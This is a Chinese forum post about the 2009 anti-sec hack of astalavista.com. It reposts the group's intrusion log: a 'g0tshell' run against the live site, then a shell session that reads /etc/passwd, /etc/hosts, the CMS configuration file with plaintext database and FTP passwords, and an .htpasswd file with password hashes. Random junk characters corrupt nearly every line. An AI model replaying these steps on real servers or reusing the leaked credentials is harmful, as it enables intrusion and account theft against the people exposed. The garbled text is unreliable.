里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。/ ?0 A. C, {3 v% V6 D+ [
: }' W+ {/ X' q* D
[root@front3 ~]# curl -I litespeedtech.com
8 S7 d! Q* S4 }3 r0 g' ZHTTP/1.1 200 OK
3 T3 {' f; [# f5 q) O: i, L2 fDate: Fri, 05 Jun 2009 22:54:51 GMT0 [8 c v7 z$ f! c$ D: e- h$ V
Server: LiteSpeed
- X8 d# G+ C$ [* O3 k8 v; V" D2 {; W J3 H6 z3 ^) [( t
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
( `3 d9 J/ {. S: r4 K+ P$ C$ g: b3 x
9 e& e, o* a2 V2 J有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
1 n& y, S& m4 N" V1 s* I5 n4 q# p( @/ f
, _2 G- M9 e! z- J$ ~ x& e
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 1 K. \, |) ?! g! v8 W; s% |
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \3 R% q) L# k- L0 U$ }0 f
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \# {" v5 o0 ~) \" j$ {" w
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
! ~8 K) g% `- W \/ \/ \/ \/ \/ \/ \/' P$ g! I( m( \0 M
The Hacking & Security Community( d& r; s. h, E+ F
[+] Founded in 1997 by a hacker computer enthusiast' R) ~" Z p. `
[-] Exposed in 2009 by anti-sec group& q" j* X1 K* q( ]9 C
+ }) o; b; N" B9 h9 |) b0 \From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
- ?- s0 |& A/ O! v& W% I7 j& D7 M. c; N>> 03. Who’s behind the site?
$ o) V) g4 _ G! j>>8 B& u2 n5 \% ]; a& M% A
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
0 A' D2 Z0 L) D# ~/ y& v3 h4 r( |6 W6 T/ a. @% `' q
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' y" R; k2 F8 T. h
>>
7 Q% H, r% \3 v$ e# `5 a>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
/ f9 Z( N% V a8 [" F* l. Xmilitary institutions.
+ a2 l# q1 E1 n( x>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information., A- G3 q: l; y. C
" v# @' h: ^( z2 `Why has Astalavista been targeted?
% q7 X6 t3 f! x7 d) }+ Z' F
4 Q( m9 H F& E& ]Other than the fact that they are not doing any of this for the “community” but" `0 q9 H H* P2 A
for the money, they spread exploits for kids, claim to be a security community
: N3 Z1 W% a& l; V+ y1 ^(with no real sense of security on their own servers), and they charge you $6.66
. @" L+ B8 F2 z6 b& \0 S3 n1 lper months to access a dead forum with a directory filled with public releases
5 I6 M' ]3 o: e1 q5 [and outdated / broken services.) _9 |: X0 t, B# e E: X# s
3 ^ f6 D( q3 Q' OWe wanted to see how good that “team of security and IT professionals” really is.! Z1 _2 j, J% O2 O6 ~
( G, a% c, d7 p: Z1 ^1 X$ {0 gLet’s begin.! s g4 A/ V3 W! d8 e" x- c6 H
; }% y' e0 y; C/ X0 m+ I
anti-sec:~# ./g0tshell astalavista.com -p 80
2 p& a! s& V5 s5 [" M[+] Connecting to astalavista.com:80' a# S% F- x! E) u7 f
[+] Grabbing banner…7 c* a, g0 L9 b- V
LiteSpeed
! Y6 _! w6 w6 k! ^[+] Injecting shellcode…
& f; h" V1 N( W# ]9 W3 X[-] Wait for it4 G) m& q5 f1 V' @' u; l
( ~ _8 `$ ]5 D0 q4 Z) q/ A! _0 ?
[~] We g0tshell
8 F' n+ L9 H3 suname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux) }1 o2 Y0 _/ S% J7 S, W
ID: uid=100(apache) gid=500(apache) groups=500(apache)9 {. x- v: O0 U: I/ l" s$ q
, s% P; N k% P" I% `1 O/ M
sh-3.2$ cat /etc/passwd
6 m5 m$ ]) h1 z8 oroot:x:0:0:root:/root:/bin/bash
G4 |* k' d+ u% ybin:x:1:1:bin:/bin:/sbin/nologin2 \, r( J) a4 k/ e5 W; d% q
daemon:x:2:2:daemon:/sbin:/sbin/nologin
* I: y, ~* ?* w4 |& r8 Jadm:x:3:4:adm:/var/adm:/sbin/nologin, ~$ N. s# K, {5 O0 o3 I5 e! p
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin# P) L5 r, i2 E
sync:x:5:0:sync:/sbin:/bin/sync: ]" ~& w$ n/ r0 {' u; c
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown! o- B; C9 L5 V) p; z8 M
halt:x:7:0:halt:/sbin:/sbin/halt* m5 m1 v1 f* g+ Z0 H' g0 f& y
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin4 A. e2 u$ D4 X( p3 m/ `& D
news:x:9:13:news:/etc/news:7 P7 P; i' [ I5 [7 L$ S
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
. ]3 P9 ]+ o9 x; @1 Q! g. zoperator:x:11:0 perator:/root:/sbin/nologin, W' ^8 P6 K% h0 o
games:x:12:100:games:/usr/games:/sbin/nologin
- ^7 u: D" R. dgopher:x:13:30:gopher:/var/gopher:/sbin/nologin5 f4 R- ~: I u; t# W# t/ z
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin3 M& n: W2 I( I% \
nobody:x:99:99:Nobody:/:/sbin/nologin
2 G: G) q; G I6 Q: r: \2 ^5 Drpm:x:37:37::/var/lib/rpm:/sbin/nologin
c2 T {6 \, f9 L; m' F- q' Cdbus:x:81:81:System message bus:/:/sbin/nologin
8 H" n5 h) J0 j1 vnscd:x:28:28:NSCD Daemon:/:/sbin/nologin- e6 W0 l0 a( n A6 K
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin+ a+ a+ X- D+ c' @9 Y
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
: O" W a+ H- C( r( {1 j$ N! {vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
; R, R3 V+ E2 q+ H6 Xhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin, [) s; r/ G0 @9 o7 L4 A
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
; r i ?' z" u, T$ Krpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
% e) c0 a* O! k* E& N% Q+ R% X* }nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
% j# D( Z2 f+ H; q9 j* O. h" F0 Msshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
# L+ Q/ [; B5 jpcap:x:77:77::/var/arpwatch:/sbin/nologin/ l: s+ H2 ^& O- \
named:x:25:25:Named:/var/named:/sbin/nologin
) c( A9 d+ S- S8 Hapache:x:100:500::/var/www:/bin/false
5 g% Q3 k9 R/ \' C( r2 x9 R# R$ o- W4 Rdiradmin:x:101:101::/usr/local/directadmin:/bin/bash8 x, F7 m5 I7 A# p4 o
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash4 ~% Q9 q& m Z* |, P5 E& w
webapps:x:500:501::/var/www/html:/bin/bash
4 i6 e0 x- }+ D7 B4 j* h d1 O7 _3 U9 o) Amajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash b' v1 g0 f1 O4 W. t
admin:x:501:502::/home/admin:/bin/bash
3 u& r* u+ L. v! J2 i% K6 Ljon:x:502:503::/home/jon:/bin/bash0 c) B# J6 c5 h* t% ^ h
com:x:503:504::/home/com:/bin/bash
# O' d& C$ {" ~, L3 t4 n) Pntp:x:38:38::/etc/ntp:/sbin/nologin
$ s) l1 B( W. H: I4 N' Nais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin1 e9 r1 B+ a W7 G" {, a$ u! R3 W
astanet:x:504:505::/home/astanet:/bin/bash: u2 J2 d2 _( V" a% R# z# `! L
avahi:x:70:70:Avahi daemon:/:/sbin/nologin# `! u$ f& @% ?6 u8 }) F+ I
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
9 R' Z" X2 W$ j8 s9 R- y6 ^: X; P& Y! e
sh-3.2$ cat /etc/hosts
* | c; Z; {" K+ a5 q8 p; t. F# Do not remove the following line, or various programs
6 _( m0 z& ?% D, c9 P# that require network functionality will fail.7 Z- t# }8 B/ I
127.0.0.1 localhost.localdomain localhost0 P3 I; I: X, P/ T4 ~: J
::1 localhost6.localdomain6 localhost61 a# l2 I) w' x, a# Y6 U
80.74.154.172 asta1.astalavistaserver.com
$ W; U% w/ ~8 c; \8 P7 s1 K P% t1 X* X5 Y6 \: k
sh-3.2$ pwd4 N+ [9 P0 n4 \
/home/com/public_html
, {3 a* r- v/ g$ I8 S. T# d T$ T8 l& v3 u! Z, X
sh-3.2$ ls -la
. t/ [2 |+ R6 u0 @ K0 ytotal 18460
$ L: U6 P3 ]: [/ X. Ldrwxr-xr-x 30 com apache 4096 May 28 17:06 .$ ]4 r) [ D: `) D! f) U
drwx–x–x 11 com com 4096 Jun 25 2008 ..
+ j( x+ Z! m5 q2 F; z$ ^- ndrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin6 z' W; `1 q( A L
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache6 u- _# w& r0 ]% z4 @7 _
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin$ @6 E9 C5 c8 a9 e
drwxrwxrwx 2 com com 4096 May 19 00:50 config
6 C* G" x5 J9 m5 W" b7 idrwxr-xr-x 2 com com 4096 Mar 20 11:05 core# J8 \ [* B0 `; |3 Y5 s* f7 l6 R
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
, O. G+ t4 [7 B7 \/ ^/ W" Kdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
* s) B1 [" ^4 s C* Z. T' x7 }drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
' Y- Y) ]1 k7 f% ~0 A. H- z b/ ydrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__9 D' _0 j i& s, G
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php! {( b1 i- L* w$ C. A
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
& ` |4 \) X& f4 L K, fdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor/ x- n/ d; P( A
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
( u, F/ L" g8 J: x# r+ Z# Jdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed6 v. h0 W; k$ o% D: F& L
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
2 e6 @& |& V$ a1 _' Q2 y8 P-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
; M. d6 |3 f' o* p-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak7 h& J# _% Y4 [( c1 _+ Y
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool" ]3 d6 Q9 a6 e5 L
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
; x/ P$ o( c" P g x, y) m2 y-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
" z. l* \: P' V8 d4 tdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
& S" J( t# E) l8 o+ bdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang/ O; W) y8 Q8 M
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib7 J$ E1 [0 H. G# L( \
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
- V" x$ s4 W0 I2 R0 j& A/ O# k3 ydrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
6 S) ]. K" E3 F9 d- C) J& ydrwxr-xr-x 34 com com 4096 May 28 16:30 modules& W6 l$ }$ P3 T! c2 [9 `1 G
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin; H# ]$ q" f ]5 O1 v o+ s
drwxrwxr-x 22 com com 4096 May 28 17:06 _new- k, {& ~; H7 V" q7 k
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
0 ^9 I7 k+ A% _drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy2 k+ u" ?" k/ @( @" B
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy. l2 W7 C8 b7 H! G
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
, y8 X* ]9 W* D* E-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml7 Y$ A; B7 U, z
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
( U- p. H3 I6 A2 v0 Fdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes5 U/ z$ o; {! e1 W# i
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp+ m5 u7 V2 n, g c" B; a. c
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
: V$ |: g8 C. |, Q1 e9 f5 \5 y& @% t/ c- L% S1 o0 ^
sh-3.2$ head -20 index.php1 p, t" E/ {* H% R6 Z) ^
<?php
2 o/ L& G+ \' \" Z5 ?
6 J, U) F+ ^! A) z6 V+ F/**0 G# A: c2 t. Q( H6 s
* The main page for the CMS
6 y$ U8 M7 |/ S* @copyright CONTREXX CMS - COMVATION AG8 S0 Y2 ~, v' C; R7 q0 n. b" R' R# P
* @author Comvation Development Team
6 ^( D+ W8 C9 K7 Q. g* @version v1.0.9.10.1 stable6 [/ ?# O$ w- ~- X* N: [/ x+ U! m- t& j
* @package contrexx$ E/ J; J- D9 d( Z5 m( l
* @subpackage core
8 E7 Y4 \3 [4 u* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage" j3 i' _! j0 i5 v' J3 S; ]4 _* J) g
* @since v0.0.0.0+ `" |$ Z( T8 N9 @1 K
* @todo Capitalize all class names in project) b. K5 r& {5 j' N: E# _ m
* @uses /config/configuration.php
8 S; j# [" g- e. P& Q* @uses /config/settings.php, `8 h4 T4 @4 N7 D
* @uses /config/version.php, i9 \8 T7 w O2 M4 I' w
* @uses /core/API.php# W% L# _9 h- @% z$ X
* @uses /core_modules/cache/index.class.php& R b9 |# e7 e# T; ?
* @uses /core/error.class.php
/ | Q7 K8 j. s6 T8 h* @uses /core_modules/banner/index.class.php
* X+ h- t/ X- W1 Q3 O# J4 ]* @uses /core_modules/contact/index.class.php8 ~% v; x1 A( Q1 p
1 w# g. L; m8 Q1 \& A* z% J. V
sh-3.2$ cd config/
' M0 J0 N! A3 dsh-3.2$ ls -la
* p- j3 g+ S" d9 r2 _8 }total 32" @0 y# K% P- L7 X
drwxrwxrwx 2 com com 4096 May 19 00:50 .% b! r4 C" w9 V7 @! Z
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..; e+ U, @+ R2 R3 c6 L! X
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php- I+ h4 e. R9 A* p, I
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php. U6 q7 C+ q0 u: p) r+ o& c
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
' z1 R7 R, w& s1 i- X-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
0 B0 @( P8 G7 ~$ x5 K/ X4 |5 O& h9 ?3 l
sh-3.2$ cat configuration.php1 p0 l# D" k5 U2 H% {' \0 |
[snip]! b- t: j; Y. ^9 z
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
3 k! w. p, z0 a$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
& c3 V p$ J. P a2 t$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix2 `6 e" Y1 t( {- K
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
4 N" m- i5 g( W1 D/ L6 k9 D$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
/ R. b1 k6 ]! x1 k3 x, i9 A$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)* I9 D# O/ w5 k- y" k% y$ c3 t1 E
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
5 P: H* t+ F" e0 | g[snip]# K* U7 @) N+ w `
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
6 @' v3 I4 h+ C' O9 f( l" Z$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode* f" L' D% e' m: N$ X
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost/ C4 N. U% y9 d
$_FTPCONFIG['port'] = 21; // Ftp remote port: [, C; u. S" o. z2 M3 T! m$ a
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
) \' D) y, @# h Z$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
' E* D; l. j6 Z: E* a/ |1 ^0 N$ W$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms% G7 l2 C9 O0 @. r H9 B m1 y
2 J) @5 o9 Z/ x1 Vsh-3.2$ cd ..
: Q2 \# a" M9 Y4 T3 ^7 ~ u. Nsh-3.2$ cd dvd/4 |- ~" N/ z/ b1 h/ D8 E! F0 s% w2 v
sh-3.2$ ls -la4 E( `5 Y) ?$ V; G3 D# p
total 29137807 f$ z5 E3 [. O, J" D
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
9 |6 Q+ e7 y+ P$ v/ Z) M. Ddrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' Y8 L3 z, |, g-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
4 Y+ b: A, U2 I-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
; {; }1 m0 Z6 i4 a5 J' X-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
|8 H ]7 ^2 [! a, K. n-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess8 k. J9 f9 f5 f( Z5 @
& J9 c" i! A; V+ y8 r9 h. p
sh-3.2$ cat .htaccess. C. C3 t. Y* s" m9 x+ q
authType Basic: v' S# R& y) \! A% \3 z
authName DVD
% T# \: i' ~1 u6 [authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd4 k( q+ S7 q( Z# r( W
require valid-user
; p0 [1 G' y4 F3 ^7 J
" p( I+ d# q5 Z/ O: B% Vsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
+ F: g/ x" Q( s' c# P( R5 z# u( TDVDdownload:CRD8cuY6.MPT6: g( L3 o" W; L4 X5 P" k
DVDdownload2:CR8a36.wluFMg
& J! ^9 J& C" `- F# e7 M2 T0 x2 M+ _0 L- \. S: E
sh-3.2$ cat test.php7 j: x, L! a6 F
<?php: S6 d+ o. y" W4 k3 q
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;6 f- V* }1 ]' p( r
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url))); H" q. D# j7 I
echo $url;
. ]: k7 ?3 c- s" c8 t; }; K?>$ V+ e$ ^' X1 }2 R$ Z$ _
& ]: q6 N' ]5 m9 W5 P; o) i3 C
sh-3.2$ cd modifications/
0 W: {2 L8 w( o' E" Q" x0 z c6 osh-3.2$ ls -la
9 k8 Q# X6 U/ |1 G' u" E* B9 rtotal 322 G1 h/ J/ X0 T7 x& |. k/ w
drwxr-xr-x 8 com com 4096 May 11 12:48 .# @0 P% y* F$ {1 x2 Q" U" p! F/ M
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& r/ M9 ~" ]/ R1 a) C6 k' Udrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
' J* i4 m& R- zdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs" ?( [6 G5 X& h# N/ ^, b" a
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
3 }' V2 X8 x& F# Adrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc( R; l" j2 u4 r. T! P
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
$ E9 G; p0 ~: Q% o2 p3 M- Ldrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
/ ]1 O, g' Q2 v+ N& z- ]. X6 o) d: G) f4 e8 `7 [
sh-3.2$ ls -R
( j, ~6 a/ A! T- R& l$ c! l.:
! `, I3 r& k% W3 Ycom_avtng cronjobs onlinetools pjirc search _tmp7 Q& w8 }7 H/ @! r* `
! J9 W( u$ z* i3 Q8 W2 o0 H./com_avtng:
5 v9 P7 V$ W) Q' ]avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
) w: X% Y- q6 `2 ~) b1 h/ |) O! ^7 ]4 ?; [# F% @
./com_avtng/scripts:
" F* ^7 F) J4 Z% l i, vpopunder.js
' c" c% w; @# b% J& g
+ G7 V2 G3 a! M' F./cronjobs:
3 s; t! [' a5 t% w1 ^" R, _# Yexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp5 Y# {& P6 R( k! `8 `
( T" @- ^9 t4 J: P: v0 K./cronjobs/tmp:7 ~" ^; B+ d; R% @% i
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
4 ~0 _: C; b, s; i1 q) b. i7 X$ \( }. k% t3 W
./onlinetools:
9 F5 y- L( R; F$ n% T: k; Qindex.php9 s3 O7 W9 W7 t1 X3 ~$ o3 g! g
7 U; Y0 J, H i# L0 J3 o' I. d
./pjirc:
( f7 w2 W$ }6 `. \a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& D' I, }2 P( _" |+ o4 x* Q- OAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
/ \5 A8 S* q( {0 s! `& [) D# Gbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd5 M9 m0 A3 y, \4 l/ `* F
: g' O9 T& _ T8 `2 K# }+ e
./pjirc/img:
- \: E* @7 q' ?& B0 lange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
- p A' f( i& f' @* c: tarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
2 G$ `# ~3 ~# x, E, B8 |8 d) _3 Q: everre-eau.gif5 k2 }! X9 a7 ]. ?2 |5 c
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 4 H+ ]) y# o* _1 P9 ], E" v
verre-vin.gif
! K. u# n1 u* h( Aballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif; h* s- t* B( F( S; T* A6 g
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
& |* M: O5 I4 ]1 D/ |5 |# {! _- {4 _
./pjirc/snd:0 m7 Q6 o) k/ |& C7 C4 l3 g. r8 A
bell2.au ding.au
% f, [, B2 N& P' G5 a
% x. a! J% z" G; y% ]( t# p0 _./search:* A, Q; ]' J V2 P+ [1 {
searchEngines.php search.php
- X5 ]% L6 b2 J$ c! A' R0 j2 O: o R6 D7 ~9 x, x' ]
./_tmp:
( \+ ?- R$ A- T* P' X3 BdefaultPorts.php defaultPorts.txt5 G" r; r& C( S2 f, T/ R% F
& @8 z7 C: e, P. Z0 H, [
sh-3.2$ cd cronjobs/
6 R; o% j( ?8 [, P! x3 i3 K8 c0 Dsh-3.2$ cat exploits.php8 X5 M* `- m! n) y! @6 Z( V
[snip]
! l. t" g. O; y9 q k& _$ s* D; I$categories = array();
" P P1 D4 u+ ]1 O( p$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;8 \/ Y" p) J8 Y7 s" n% p
$expolits = file($milw0rmFile);! ^ e4 N- u* L0 f: b+ R' }& ]2 U! ?
$comExploits = array();
/ u9 E4 U/ v0 t n, w+ w[snip]
5 ^4 V, r0 q4 B) q1 W6 ?// manage data
/ k1 A) @; L4 ?for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
e* w* a7 b1 J; V
( U% }' o* ~% m // get path and title6 B. v4 s/ I* R3 z/ i
$expolits[$x] = trim($expolits[$x]);, F$ {) |! `6 w
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));% o4 h" G! J1 ?/ \4 ?5 y' j: S
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
% \3 T# ?; v9 c6 t7 v" d
. R t' R- q3 P: m$ \ // check if file exists4 m+ P5 x9 w' z0 s* R) E( x# y, i
if (file_exists($path)) {
; e: L, D a) c( c6 r) C
( s" A+ R5 i& M1 m i $text = file_get_contents($path);/ T8 j9 v5 Z. H# a B$ A- m
- J% ~" c0 ^ z) m // get content and date& a% N& j; p0 ~1 T$ }
//$text = htmlspecialchars($text, ENT_QUOTES);! ?1 Y# m* g) o: d
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
' S! b3 Q: S% k4 K3 A+ f3 | if ($tmptext != ”) {$ b- _3 x: C& h; r
$text = $tmptext;9 B" U9 ]8 `/ K7 C' Z6 s
} else {
* ]5 o0 l7 ^* c $text = addslashes(htmlentities($text, ENT_QUOTES));
- G3 G9 J; s, m2 I }/ ^+ v% S# [5 G& D# Z# j: R8 p3 Q
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
* |; H5 m' b3 C% W $tmp = explode('-', $date);8 \; _& s. Y2 x, _# G2 U
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));! W8 Y& k1 k4 X4 S$ P
$cat = getCategory ($path);; I! D* I, @; N8 X9 p. T' `" e
$ext = pathinfo(basename($path));
4 \# ^& x$ h" n+ O $ext = $ext['extension'];
" X' T! n" F+ h6 D8 c# y; A $qStr = ”
# e1 A; w+ ^, r) P0 E( ? SELECT `id`8 `8 q+ `% Q1 b! d* G! K# I
FROM `contrexx_module_exploits`( H. P$ i# r1 ~) D. T% m" z2 S
WHERE `title` = ‘” . $title . “‘
8 i1 h: l! c' u* | AND `date` = ‘” . $date . “‘2 e! r4 E& L/ x7 k
“;1 Y4 M) ?6 `- L2 |2 f
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
, H; P% I/ l! j u2 Q0 C0 ` c8 b5 y $q = $_objDB->query($qStr);# b, `5 s( o# p% ?3 d4 g
3 U# n0 ~$ e0 }3 P$ w
if ($q->numRows() == 0) {& S+ w4 Y3 Q9 Y7 x r* Z
$ B9 q% K Q1 p2 e
// prepare array
6 | B( H% x: Y* N $comExploits[$x]['date'] = $date;$ c6 \- ? ~* Y9 O; m( F5 I: u
$comExploits[$x]['title'] = $title;4 B+ J9 P4 G$ c% m8 d6 U
$comExploits[$x]['author'] = ‘milw0rm’;5 \( I7 n. _0 Q l
$comExploits[$x]['text'] = $text;# a3 K0 C0 h0 y( m5 Q. q- ]0 x2 q, s
$comExploits[$x]['source'] = $ext;) X: c! k4 F0 [2 ]
$comExploits[$x]['url1'] = ”;* M( E1 _* X: A. M7 u
$comExploits[$x]['url2'] = ”;
+ Y# a0 h" m; t* u$ @+ L4 o6 T3 J $comExploits[$x]['catid'] = $cat;' d3 R% i$ s6 h
$comExploits[$x]['lang'] = ‘2′; D; P+ S6 k$ `0 ^
$comExploits[$x]['userid'] = ‘12′;
. ^3 S2 T2 V, C1 @. j& J $comExploits[$x]['startdate'] = ‘0000-00-00′;
0 D7 V+ X! D7 G4 |( K& E $comExploits[$x]['enddate'] = ‘0000-00-00′;
3 c+ q, g4 E3 V0 `7 f- G. ` $comExploits[$x]['status'] = ‘1′;# k. e7 H6 V7 |( |, L: f
$comExploits[$x]['changelog'] = $date;5 R, d; [' X+ H( e* H7 s2 b
! L; c4 ^6 w: ?0 f
}
! B0 P$ t2 H; U; I4 A8 r[snip]
T w8 r; y* E" g2 E5 ~0 {0 }* j4 E $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>6 x q8 K' i% O( o" J/ J6 O: G2 a
<rss version=”2.0″>
$ C# l0 p; m* o8 N. C+ Q5 s <channel>: a/ B0 |$ p9 E, |
